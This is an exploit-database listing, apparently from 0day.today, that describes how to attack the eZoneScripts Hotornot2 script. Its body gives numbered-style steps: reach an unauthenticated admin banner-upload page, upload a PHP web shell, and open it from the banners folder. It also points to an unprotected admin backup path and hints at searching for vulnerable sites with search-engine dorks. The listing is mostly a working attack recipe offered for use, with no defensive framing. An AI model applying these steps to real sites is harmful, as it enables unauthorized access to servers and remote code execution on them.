[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulns

Author
sniper code
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5248
Category
web applications
Date add
25-05-2009
Platform
unsorted
==================================================================
eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulns
==================================================================


  [+]
     Hotornot2 Script (Remote apload) Admin Bypass Vulnerability

    ===================================================================================================================

    Author : sniper code  ( S.C.T-443 )
    ===================================================================================================================
    [+]
    ScRipT : http://www.ezonescripts.com/scripts/sls/hotornot2.php
    ====================================================================================================================
    [+]
    Exploit:

    GO to :
    http://localhost/[path]/admin/sitebanners/upload_banners.php ( no need to registeration)

    you will see (Upload banners)

    ( browse and select file like example : Shell.php) and press upload )
    you can press View banners button to see and ensoure your file uploaded ...

    then Go to :
    http://localhost/[path]/banners/Shell.php    ( will view the shell )

    [+]
    for bypassing admin backup :
    Go to :
    http://localhost/[path]/admin/backup

    dork : use ur mind ^_^

    Thats it . . .
                            
    ===================================================================================================================



#  0day.today [2024-07-07]  #